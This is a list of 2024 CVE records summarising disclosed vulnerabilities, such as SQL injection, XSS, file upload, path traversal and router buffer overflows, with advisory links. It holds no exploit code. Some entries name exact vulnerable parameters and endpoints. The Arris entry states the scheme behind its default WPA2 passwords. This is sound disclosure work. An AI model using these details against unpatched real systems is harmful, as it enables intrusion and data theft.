CVE 2024 25902 Candidate Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in miniorange Malware Scanner.This issue affects Malware Scanner: from n/a through 4.7.2. MISC:https://patchstack.com/database/vulnerability/miniorange-malware-protection/wordpress-malware-scanner-plugin-4-7-2-admin-sql-injection-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/miniorange-malware-protection/wordpress-malware-scanner-plugin-4-7-2-admin-sql-injection-vulnerability?_s_id=cve Assigned (20240212)
CVE 2024 2590 Candidate Vulnerability in AMSS++ version 4.31 that allows SQL injection through /amssplus/modules/mail/main/select_send.php, in the 'sd_index' parameter. This vulnerability could allow a remote attacker to send a specially crafted SQL query to the server and retrieve all the information stored in the DB. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss Assigned (20240318)
CVE 2024 25898 Candidate A XSS vulnerability was found in the ChurchCRM v.5.5.0 functionality, edit your event, where malicious JS or HTML code can be inserted in the Event Sermon field in EventEditor.php. MISC:https://github.com/ChurchCRM/CRM/issues/6851 Assigned (20240212)
CVE 2024 25897 Candidate ChurchCRM 5.5.0 FRCatalog.php is vulnerable to Blind SQL Injection (Time-based) via the CurrentFundraiser GET parameter. MISC:https://github.com/ChurchCRM/CRM/issues/6856 Assigned (20240212)
CVE 2024 25896 Candidate ChurchCRM 5.5.0 EventEditor.php is vulnerable to Blind SQL Injection (Time-based) via the EID POST parameter. MISC:https://github.com/ChurchCRM/CRM/issues/6854 Assigned (20240212)
CVE 2024 25895 Candidate A reflected cross-site scripting (XSS) vulnerability in ChurchCRM 5.5.0 allows remote attackers to inject arbitrary web script or HTML via the type parameter of /EventAttendance.php MISC:https://github.com/ChurchCRM/CRM/issues/6853 Assigned (20240212)
CVE 2024 25894 Candidate ChurchCRM 5.5.0 /EventEditor.php is vulnerable to Blind SQL Injection (Time-based) via the EventCount POST parameter. MISC:https://github.com/ChurchCRM/CRM/issues/6849 Assigned (20240212)
CVE 2024 25893 Candidate ChurchCRM 5.5.0 FRCertificates.php is vulnerable to Blind SQL Injection (Time-based) via the CurrentFundraiser GET parameter. MISC:https://github.com/ChurchCRM/CRM/issues/6856 Assigned (20240212)
CVE 2024 25892 Candidate ChurchCRM 5.5.0 ConfirmReport.php is vulnerable to Blind SQL Injection (Time-based) via the familyId GET parameter. MISC:https://github.com/ChurchCRM/CRM/issues/6858 Assigned (20240212)
CVE 2024 25891 Candidate ChurchCRM 5.5.0 FRBidSheets.php is vulnerable to Blind SQL Injection (Time-based) via the CurrentFundraiser GET parameter. MISC:https://github.com/ChurchCRM/CRM/issues/6856 Assigned (20240212)
CVE 2024 2589 Candidate Vulnerability in AMSS++ version 4.31 that allows SQL injection through /amssplus/modules/book/main/bookdetail_school_person.php, in multiple parameters. This vulnerability could allow a remote attacker to send a specially crafted SQL query to the server and retrieve all the information stored in the DB. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss Assigned (20240318)
CVE 2024 2588 Candidate Vulnerability in AMSS++ version 4.31 that allows SQL injection through /amssplus/admin/index.php, in the 'id' parameter. This vulnerability could allow a remote attacker to send a specially crafted SQL query to the server and retrieve all the information stored in the DB. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss Assigned (20240318)
CVE 2024 25876 Candidate A cross-site scripting (XSS) vulnerability in the Header module of Enhavo CMS v0.13.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title text field. MISC:https://github.com/dd3x3r/enhavo/blob/main/xss-page-content-header-titel-v0.13.1.md | MISC:https://www.enhavo.com/ Assigned (20240212)
CVE 2024 25875 Candidate A cross-site scripting (XSS) vulnerability in the Header module of Enhavo CMS v0.13.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Undertitle text field. MISC:https://github.com/dd3x3r/enhavo/blob/main/xss-page-content-header-undertitel-v0.13.1.md | MISC:https://www.enhavo.com/ Assigned (20240212)
CVE 2024 25874 Candidate A cross-site scripting (XSS) vulnerability in the New/Edit Article module of Enhavo CMS v0.13.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Create Tag text field. MISC:https://github.com/dd3x3r/enhavo/blob/main/xss-create-tag-v0.13.1.md | MISC:https://www.enhavo.com/ Assigned (20240212)
CVE 2024 25873 Candidate Enhavo v0.13.1 was discovered to contain an HTML injection vulnerability in the Author text field under the Blockquote module. This vulnerability allows attackers to execute arbitrary code via a crafted payload. MISC:https://github.com/dd3x3r/enhavo/blob/main/html-injection-page-content-blockquote-author-v0.13.1.md | MISC:https://www.enhavo.com/ Assigned (20240212)
CVE 2024 2587 Candidate Vulnerability in AMSS++ version 4.31 that allows SQL injection through /amssplus/modules/book/main/bookdetail_khet_person.php, in multiple parameters. This vulnerability could allow a remote attacker to send a specially crafted SQL query to the server and retrieve all the information stored in the DB. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss Assigned (20240318)
CVE 2024 25869 Candidate An Unrestricted File Upload vulnerability in CodeAstro Membership Management System in PHP v.1.0 allows a remote attacker to execute arbitrary code via upload of a crafted php file in the settings.php component. MISC:https://github.com/0xQRx/VulnerabilityResearch/blob/master/2024/MembershipManagementSystem-Unrestricted_Fileupload.md Assigned (20240212)
CVE 2024 25868 Candidate A Cross Site Scripting (XSS) vulnerability in CodeAstro Membership Management System in PHP v.1.0 allows a remote attacker to execute arbitrary code via the membershipType parameter in the add_type.php component. MISC:https://github.com/0xQRx/VulnerabilityResearch/blob/master/2024/MembershipManagementSystem-Stored_XSS_Add_Type.md Assigned (20240212)
CVE 2024 25867 Candidate A SQL Injection vulnerability in CodeAstro Membership Management System in PHP v.1.0 allows a remote attacker to execute arbitrary SQL commands via the membershipType and membershipAmount parameters in the add_type.php component. MISC:https://github.com/0xQRx/VulnerabilityResearch/blob/master/2024/MembershipManagementSystem-SQL_Injection_Add_Type.md Assigned (20240212)
CVE 2024 25866 Candidate A SQL Injection vulnerability in CodeAstro Membership Management System in PHP v.1.0 allows a remote attacker to execute arbitrary SQL commands via the email parameter in the index.php component. MISC:https://github.com/0xQRx/VulnerabilityResearch/blob/master/2024/MembershipManagementSystem-SQL_Injection_Login.md Assigned (20240212)
CVE 2024 25865 Candidate Cross Site Scripting (XSS) vulnerability in hexo-theme-anzhiyu v1.6.12, allows remote attackers to execute arbitrary code via the algolia search function. MISC:https://github.com/anzhiyu-c/hexo-theme-anzhiyu/issues/200 Assigned (20240212)
CVE 2024 2586 Candidate Vulnerability in AMSS++ version 4.31 that allows SQL injection through /amssplus/index.php, in the 'username' parameter. This vulnerability could allow a remote attacker to send a specially crafted SQL query to the server and retrieve all the information stored in the DB. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss Assigned (20240318)
CVE 2024 25859 Candidate A path traversal vulnerability in the /path/to/uploads/ directory of Blesta before v5.9.2 allows attackers to takeover user accounts and execute arbitrary code. MISC:https://www.blesta.com/2024/02/08/security-advisory/ Assigned (20240212)
CVE 2024 25858 Candidate In Foxit PDF Reader before 2024.1 and PDF Editor before 2024.1, code execution via JavaScript could occur because of an unoptimized prompt message for users to review parameters of commands. CONFIRM:https://www.foxit.com/support/security-bulletins.html Assigned (20240212)
CVE 2024 25854 Candidate Cross Site Scripting (XSS) vulnerability in Sourcecodester Insurance Management System 1.0 allows attackers to run arbitrary code via the Subject and Description fields when submitting a support ticket. MISC:https://github.com/hakkitoklu/hunt/blob/main/Insurance%20Management%20System%20PHP%20and%20MySQL%201.0/xss.md Assigned (20240212)
CVE 2024 25851 Candidate Netis WF2780 v2.1.40144 was discovered to contain a command injection vulnerability via the config_sequence parameter in other_para of cgitest.cgi. MISC:https://github.com/no1rr/Vulnerability/blob/master/netis/other_para_config_sequence.md | MISC:https://www.netis-systems.com/ Assigned (20240212)
CVE 2024 25850 Candidate Netis WF2780 v2.1.40144 was discovered to contain a command injection vulnerability via the wps_ap_ssid5g parameter MISC:https://github.com/no1rr/Vulnerability/blob/master/netis/igd_wps_set_wps_ap_ssid5g.md | MISC:https://www.netis-systems.com/ Assigned (20240212)
CVE 2024 2585 Candidate Vulnerability in AMSS++ version 4.31 that allows SQL injection through /amssplus/modules/book/main/select_send_2.php, in the 'sd_index' parameter. This vulnerability could allow a remote attacker to send a specially crafted SQL query to the server and retrieve all the information stored in the DB. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss Assigned (20240318)
CVE 2024 25849 Candidate In the module "Make an offer" (makeanoffer) <= 1.7.1 from PrestaToolKit for PrestaShop, a guest can perform SQL injection via MakeOffers::checkUserExistingOffer()` and `MakeOffers::addUserOffer()` . MISC:https://addons.prestashop.com/en/price-management/19507-make-an-offer.html | MISC:https://security.friendsofpresta.org/modules/2024/03/05/makeanoffer.html Assigned (20240212)
CVE 2024 25848 Candidate In the module "Ever Ultimate SEO" (everpsseo) <= 8.1.2 from Team Ever for PrestaShop, a guest can perform SQL injection in affected versions. MISC:https://addons.prestashop.com/fr/seo-referencement-naturel/39489-ever-ultimate-seo.html | MISC:https://security.friendsofpresta.org/modules/2024/03/05/everpsseo.html | MISC:https://www.team-ever.com/prestashop-ever-ultimate-seo/ Assigned (20240212)
CVE 2024 25847 Candidate SQL Injection vulnerability in MyPrestaModules "Product Catalog (CSV, Excel) Import" (simpleimportproduct) modules for PrestaShop versions 6.5.0 and before, allows attackers to escalate privileges and obtain sensitive information via Send::__construct() and importProducts::_addDataToDb methods. MISC:https://github.com/friends-of-presta/security-advisories/blob/main/_posts/2024-02-29-simpleimportproduct.md Assigned (20240212)
CVE 2024 25846 Candidate In the module "Product Catalog (CSV, Excel) Import" (simpleimportproduct) <= 6.7.0 from MyPrestaModules for PrestaShop, a guest can upload files with extensions .php. MISC:https://addons.prestashop.com/fr/import-export-de-donnees/19091-catalogue-de-produits-csv-excel-dimportation.html | MISC:https://security.friendsofpresta.org/modules/2024/02/27/simpleimportproduct.html Assigned (20240212)
CVE 2024 25845 Candidate In the module "CD Custom Fields 4 Orders" (cdcustomfields4orders) <= 1.0.0 from Cleanpresta.com for PrestaShop, a guest can perform SQL injection in affected versions. MISC:https://security.friendsofpresta.org/modules/2024/03/05/cdcustomfields4orders.html | MISC:https://www.cleanpresta.com Assigned (20240212)
CVE 2024 25844 Candidate An issue was discovered in Common-Services "So Flexibilite" (soflexibilite) module for PrestaShop before version 4.1.26, allows remote attackers to escalate privileges and obtain sensitive information via debug file. MISC:https://github.com/friends-of-presta/security-advisories/blob/main/_posts/2024-02-29-soflexibilite.md Assigned (20240212)
CVE 2024 25843 Candidate In the module "Import/Update Bulk Product from any Csv/Excel File Pro" (ba_importer) up to version 1.1.28 from Buy Addons for PrestaShop, a guest can perform SQL injection in affected versions. MISC:https://addons.prestashop.com/en/data-import-export/20579-import-update-bulk-product-from-any-csv-excel-file-pro.html | MISC:https://security.friendsofpresta.org/modules/2024/02/27/ba_importer.html Assigned (20240212)
CVE 2024 25842 Candidate An issue was discovered in Presta World "Account Manager - Sales Representative & Dealers - CRM" (prestasalesmanager) module for PrestaShop before version 9.0, allows remote attackers to escalate privilege and obtain sensitive information via the uploadLogo() and postProcess methods. MISC:https://github.com/friends-of-presta/security-advisories/blob/main/_posts/2024-02-29-prestasalesmanager.md Assigned (20240212)
CVE 2024 25841 Candidate In the module "So Flexibilite" (soflexibilite) from Common-Services for PrestaShop < 4.1.26, a guest (authenticated customer) can perform Cross Site Scripting (XSS) injection. MISC:https://addons.prestashop.com/fr/transporteurs/2704-colissimo-domicile-et-points-de-retrait.html | MISC:https://security.friendsofpresta.org/modules/2024/02/27/soflexibilite.html Assigned (20240212)
CVE 2024 25840 Candidate In the module "Account Manager | Sales Representative & Dealers | CRM" (prestasalesmanager) up to 9.0 from Presta World for PrestaShop, a guest can download personal information without restriction by performing a path traversal attack. MISC:https://addons.prestashop.com/en/third-party-data-integrations-crm-erp/90816-account-manager-sales-representative-dealers-crm.html | MISC:https://security.friendsofpresta.org/modules/2024/02/27/prestasalesmanager.html Assigned (20240212)
CVE 2024 2584 Candidate Vulnerability in AMSS++ version 4.31 that allows SQL injection through /amssplus/modules/book/main/select_send.php, in the 'sd_index' parameter. This vulnerability could allow a remote attacker to send a specially crafted SQL query to the server and retrieve all the information stored in the DB. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss Assigned (20240318)
CVE 2024 25839 Candidate An issue was discovered in Webbax "Super Newsletter" (supernewsletter) module for PrestaShop versions 1.4.21 and before, allows local attackers to escalate privileges and obtain sensitive information. MISC:https://github.com/friends-of-presta/security-advisories/blob/main/_posts/2024-02-29-supernewsletter.md Assigned (20240212)
CVE 2024 25833 Candidate F-logic DataCube3 v1.0 is vulnerable to unauthenticated SQL injection, which could allow an unauthenticated malicious actor to execute arbitrary SQL queries in database. MISC:https://neroteam.com/blog/f-logic-datacube3-vulnerability-report Assigned (20240212)
CVE 2024 25832 Candidate F-logic DataCube3 v1.0 is vulnerable to unrestricted file upload, which could allow an authenticated malicious actor to upload a file of dangerous type by manipulating the filename extension. MISC:https://neroteam.com/blog/f-logic-datacube3-vulnerability-report Assigned (20240212)
CVE 2024 25831 Candidate F-logic DataCube3 Version 1.0 is affected by a reflected cross-site scripting (XSS) vulnerability due to improper input sanitization. An authenticated, remote attacker can execute arbitrary JavaScript code in the web management interface. MISC:https://neroteam.com/blog/f-logic-datacube3-vulnerability-report Assigned (20240212)
CVE 2024 25830 Candidate F-logic DataCube3 v1.0 is vulnerable to Incorrect Access Control due to an improper directory access restriction. An unauthenticated, remote attacker can exploit this, by sending a URI that contains the path of the configuration file. A successful exploit could allow the attacker to extract the root and admin password. MISC:https://neroteam.com/blog/f-logic-datacube3-vulnerability-report Assigned (20240212)
CVE 2024 25828 Candidate cmseasy V7.7.7.9 has an arbitrary file deletion vulnerability in lib/admin/template_admin.php. MISC:https://github.com/sec-Kode/cve Assigned (20240212)
CVE 2024 25817 Candidate Buffer Overflow vulnerability in eza before version 0.18.2, allows local attackers to execute arbitrary code via the .git/HEAD, .git/refs, and .git/objects components. MISC:https://github.com/advisories/GHSA-3qx3-6hxr-j2ch | MISC:https://www.cubeyond.net/blog/my-cves/eza-cve-report Assigned (20240212)
CVE 2024 25811 Candidate An access control issue in Dreamer CMS v4.0.1 allows attackers to download backup files and leak sensitive information. MISC:https://github.com/Fei123-design/vuln/blob/master/Dreamer%20CMS%20Unauthorized%20access%20vulnerability.md Assigned (20240212)
CVE 2024 2581 Candidate A vulnerability was found in Tenda AC10 16.03.10.13 and classified as critical. This issue affects the function fromSetRouteStatic of the file /goform/SetStaticRouteCfg. The manipulation of the argument list leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257081 was assigned to this vulnerability. MISC:VDB-257081 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.257081 | MISC:VDB-257081 | Tenda AC10 SetStaticRouteCfg fromSetRouteStatic stack-based overflow | URL:https://vuldb.com/?id.257081 | MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10/V16.03.10.13/fromSetRouteStatic.md | URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10/V16.03.10.13/fromSetRouteStatic.md Assigned (20240317)
CVE 2024 25808 Candidate Cross-site Request Forgery (CSRF) vulnerability in Lychee version 3.1.6, allows remote attackers to execute arbitrary code via the create new album function. MISC:https://github.com/Hebing123/cve/issues/17 Assigned (20240212)
CVE 2024 25807 Candidate Cross Site Scripting (XSS) vulnerability in Lychee 3.1.6, allows remote attackers to execute arbitrary code and obtain sensitive information via the title parameter when creating an album. MISC:https://github.com/Hebing123/cve/issues/17 Assigned (20240212)
CVE 2024 25802 Candidate SKINsoft S-Museum 7.02.3 allows Unrestricted File Upload via the Add Media function. Unlike in CVE-2024-25801, the attack payload is the file content. MISC:https://shrouded-trowel-50c.notion.site/S-Museum-Version-7-02-3-Unrestricted-File-Upload-b73d4590b024449787464ddcc175b8f7?pvs=4 Assigned (20240212)
CVE 2024 25801 Candidate SKINsoft S-Museum 7.02.3 allows XSS via the filename of an uploaded file. Unlike in CVE-2024-25802, the attack payload is in the name (not the content) of a file. MISC:https://shrouded-trowel-50c.notion.site/S-Museum-Version-7-02-3-Stored-Cross-Site-Scripting-69ca7b8805cc448ea12cb8f7ed571fa3?pvs=4 Assigned (20240212)
CVE 2024 2580 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in FunnelKit Automation By Autonami allows Stored XSS.This issue affects Automation By Autonami: from n/a through 2.8.2. MISC:https://patchstack.com/database/vulnerability/wp-marketing-automations/wordpress-recover-woocommerce-cart-abandonment-newsletter-email-marketing-marketing-automation-by-funnelkit-plugin-2-8-2-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/wp-marketing-automations/wordpress-recover-woocommerce-cart-abandonment-newsletter-email-marketing-marketing-automation-by-funnelkit-plugin-2-8-2-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240317)
CVE 2024 2579 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Data443 Tracking Code Manager.This issue affects Tracking Code Manager: from n/a through 2.0.16. MISC:https://patchstack.com/database/vulnerability/tracking-code-manager/wordpress-tracking-code-manager-plugin-2-0-16-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/tracking-code-manager/wordpress-tracking-code-manager-plugin-2-0-16-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240317)
CVE 2024 2578 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPCoder WP Coder allows Stored XSS.This issue affects WP Coder: from n/a through 3.5. MISC:https://patchstack.com/database/vulnerability/wp-coder/wordpress-wp-coder-plugin-3-5-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/wp-coder/wordpress-wp-coder-plugin-3-5-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240317)
CVE 2024 25770 Candidate libming 0.4.8 contains a memory leak vulnerability in /libming/src/actioncompiler/listaction.c. MISC:https://github.com/LuMingYinDetect/libming_defects/blob/main/libming_detect_1.md Assigned (20240212)
CVE 2024 2577 Candidate A vulnerability has been found in SourceCodester Employee Task Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file /update-employee.php. The manipulation of the argument admin_id leads to authorization bypass. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257080. MISC:VDB-257080 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.257080 | MISC:VDB-257080 | SourceCodester Employee Task Management System update-employee.php authorization | URL:https://vuldb.com/?id.257080 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Employee%20Task%20Management%20System/IDOR%20-%20update-employee.php.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Employee%20Task%20Management%20System/IDOR%20-%20update-employee.php.md Assigned (20240317)
CVE 2024 25768 Candidate OpenDMARC 1.4.2 contains a null pointer dereference vulnerability in /OpenDMARC/libopendmarc/opendmarc_policy.c. MISC:https://github.com/LuMingYinDetect/OpenDMARC_defects/blob/main/OpenDMARC_detect_1.md Assigned (20240212)
CVE 2024 25767 Candidate nanomq 0.21.2 contains a Use-After-Free vulnerability in /nanomq/nng/src/core/socket.c. MISC:https://github.com/LuMingYinDetect/nanomq_defects/blob/main/nanomq_detect_1.md Assigned (20240212)
CVE 2024 25763 Candidate openNDS 10.2.0 is vulnerable to Use-After-Free via /openNDS/src/auth.c. MISC:https://github.com/LuMingYinDetect/openNDS_defects/blob/main/openNDS_detect_1.md Assigned (20240212)
CVE 2024 2576 Candidate A vulnerability, which was classified as critical, was found in SourceCodester Employee Task Management System 1.0. This affects an unknown part of the file /update-admin.php. The manipulation of the argument admin_id leads to authorization bypass. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257079. MISC:VDB-257079 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.257079 | MISC:VDB-257079 | SourceCodester Employee Task Management System update-admin.php authorization | URL:https://vuldb.com/?id.257079 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Employee%20Task%20Management%20System/IDOR%20-%20update-admin.php.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Employee%20Task%20Management%20System/IDOR%20-%20update-admin.php.md Assigned (20240317)
CVE 2024 25756 Candidate A Stack Based Buffer Overflow vulnerability in Tenda AC9 v.3.0 with firmware version v.15.03.06.42_multi allows a remote attacker to execute arbitrary code via the formWifiBasicSet function. MISC:https://github.com/TimeSeg/IOT_CVE/blob/main/tenda/AC9V3/0218/formWifiBasicSet.md Assigned (20240212)
CVE 2024 25753 Candidate Stack Based Buffer Overflow vulnerability in Tenda AC9 v.3.0 with firmware version v.15.03.06.42_multi allows a remote attacker to execute arbitrary code via the formSetDeviceName function. MISC:https://github.com/TimeSeg/IOT_CVE/blob/main/tenda/AC9V3/0218/formSetDeviceName.md Assigned (20240212)
CVE 2024 25751 Candidate A Stack Based Buffer Overflow vulnerability in Tenda AC9 v.3.0 with firmware version v.15.03.06.42_multi allows a remote attacker to execute arbitrary code via the fromSetSysTime function. MISC:https://github.com/TimeSeg/IOT_CVE/blob/main/tenda/AC9V3/0218/fromSetSysTime.md Assigned (20240212)
CVE 2024 2575 Candidate A vulnerability, which was classified as critical, has been found in SourceCodester Employee Task Management System 1.0. Affected by this issue is some unknown functionality of the file /task-details.php. The manipulation of the argument task_id leads to authorization bypass. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-257078 is the identifier assigned to this vulnerability. MISC:VDB-257078 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.257078 | MISC:VDB-257078 | SourceCodester Employee Task Management System task-details.php authorization | URL:https://vuldb.com/?id.257078 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Employee%20Task%20Management%20System/IDOR%20-%20task-details.php.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Employee%20Task%20Management%20System/IDOR%20-%20task-details.php.md Assigned (20240317)
CVE 2024 25748 Candidate A Stack Based Buffer Overflow vulnerability in tenda AC9 AC9 v.3.0 with firmware version v.15.03.06.42_multi allows a remote attacker to execute arbitrary code via the fromSetIpMacBind function. MISC:https://github.com/TimeSeg/IOT_CVE/blob/main/tenda/AC9V3/0218/fromSetIpMacBind.md Assigned (20240212)
CVE 2024 25746 Candidate Stack Based Buffer Overflow vulnerability in Tenda AC9 v.3.0 with firmware version v.15.03.06.42_multi allows a remote attacker to execute arbitrary code via the add_white_node function. MISC:https://github.com/TimeSeg/IOT_CVE/blob/main/tenda/AC9V3/0218/add_white_node.md Assigned (20240212)
CVE 2024 25744 Candidate In the Linux kernel before 6.6.7, an untrusted VMM can trigger int80 syscall handling at any given point. This is related to arch/x86/coco/tdx/tdx.c and arch/x86/mm/mem_encrypt_amd.c. MISC:https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.6.7 | MISC:https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b82a8dbd3d2f4563156f7150c6f2ecab6e960b30 Assigned (20240212)
CVE 2024 25741 Candidate printer_write in drivers/usb/gadget/function/f_printer.c in the Linux kernel through 6.7.4 does not properly call usb_ep_queue, which might allow attackers to cause a denial of service or have unspecified other impact. MISC:https://www.spinics.net/lists/linux-usb/msg252167.html Assigned (20240212)
CVE 2024 25740 Candidate A memory leak flaw was found in the UBI driver in drivers/mtd/ubi/attach.c in the Linux kernel through 6.7.4 for UBI_IOCATT, because kobj->name is not released. MISC:https://lore.kernel.org/lkml/0171b6cc-95ee-3538-913b-65a391a446b3@huawei.com/T/ Assigned (20240212)
CVE 2024 2574 Candidate A vulnerability classified as critical was found in SourceCodester Employee Task Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /edit-task.php. The manipulation of the argument task_id leads to authorization bypass. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257077 was assigned to this vulnerability. MISC:VDB-257077 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.257077 | MISC:VDB-257077 | SourceCodester Employee Task Management System edit-task.php authorization | URL:https://vuldb.com/?id.257077 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Employee%20Task%20Management%20System/IDOR%20-%20edit-task.php.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Employee%20Task%20Management%20System/IDOR%20-%20edit-task.php.md Assigned (20240317)
CVE 2024 25739 Candidate create_empty_lvol in drivers/mtd/ubi/vtbl.c in the Linux kernel through 6.7.4 can attempt to allocate zero bytes, and crash, because of a missing check for ubi->leb_size. MISC:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=68a24aba7c593eafa8fd00f2f76407b9b32b47a9 | MISC:https://groups.google.com/g/syzkaller/c/Xl97YcQA4hg | MISC:https://www.spinics.net/lists/kernel/msg5074816.html Assigned (20240212)
CVE 2024 25731 Candidate The Elink Smart eSmartCam (com.cn.dq.ipc) application 2.1.5 for Android contains hardcoded AES encryption keys that can be extracted from a binary file. Thus, encryption can be defeated by an attacker who can observe packet data (e.g., over Wi-Fi). MISC:https://github.com/actuator/com.cn.dq.ipc | MISC:https://github.com/actuator/com.cn.dq.ipc/blob/main/CVE-2024-25731 Assigned (20240211)
CVE 2024 25730 Candidate Hitron CODA-4582 and CODA-4589 devices have default PSKs that are generated from 5-digit hex values concatenated with a "Hitron" substring, resulting in insufficient entropy (only about one million possibilities). MISC:https://github.com/actuator/cve/blob/main/Hitron/CVE-2024-25730 | MISC:https://i.ebayimg.com/images/g/I-8AAOSwGE9lsGwI/s-l1600.webp | MISC:https://i.ebayimg.com/images/g/MwMAAOSwjTFk3kpd/s-l1600.webp | MISC:https://i.ebayimg.com/images/g/VDcAAOSwlodlSuz4/s-l1600.webp | MISC:https://i.ebayimg.com/images/g/XaAAAOSwvMNkuESk/s-l1600.webp | MISC:https://i.ebayimg.com/images/g/hzUAAOSwUwVllGMZ/s-l1600.webp | MISC:https://i.ebayimg.com/images/g/qK8AAOSwbr9lq3PJ/s-l1600.webp Assigned (20240211)
CVE 2024 2573 Candidate A vulnerability classified as critical has been found in SourceCodester Employee Task Management System 1.0. Affected is an unknown function of the file /task-info.php. The manipulation leads to execution after redirect. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257076. MISC:VDB-257076 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257076 | MISC:VDB-257076 | SourceCodester Employee Task Management System task-info.php redirect | URL:https://vuldb.com/?id.257076 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Employee%20Task%20Management%20System/Execution%20After%20Redirect%20-%20task-info.php.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Employee%20Task%20Management%20System/Execution%20After%20Redirect%20-%20task-info.php.md Assigned (20240317)
CVE 2024 25729 Candidate Arris SBG6580 devices have predictable default WPA2 security passwords that could lead to unauthorized remote access. (They use the first 6 characters of the SSID and the last 6 characters of the BSSID, decrementing the last octet.) MISC:https://github.com/actuator/cve/blob/main/Arris/CVE-2024-25729 | MISC:https://github.com/actuator/cve/blob/main/Arris/SBG6580.png | MISC:https://i.ebayimg.com/images/g/DhoAAOSwx0FbhhcN/s-l1600.jpg | MISC:https://i.ebayimg.com/images/g/z2oAAOSwO1pbQ9BS/s-l1600.jpg Assigned (20240211)
CVE 2024 25728 Candidate ExpressVPN before 12.73.0 on Windows, when split tunneling is used, sends DNS requests according to the Windows configuration (e.g., sends them to DNS servers operated by the user's ISP instead of to the ExpressVPN DNS servers), which may allow remote attackers to obtain sensitive information about websites visited by VPN users. MISC:https://www.bleepingcomputer.com/news/security/expressvpn-bug-has-been-leaking-some-dns-requests-for-years/ | MISC:https://www.expressvpn.com/blog/windows-app-dns-requests/ Assigned (20240211)
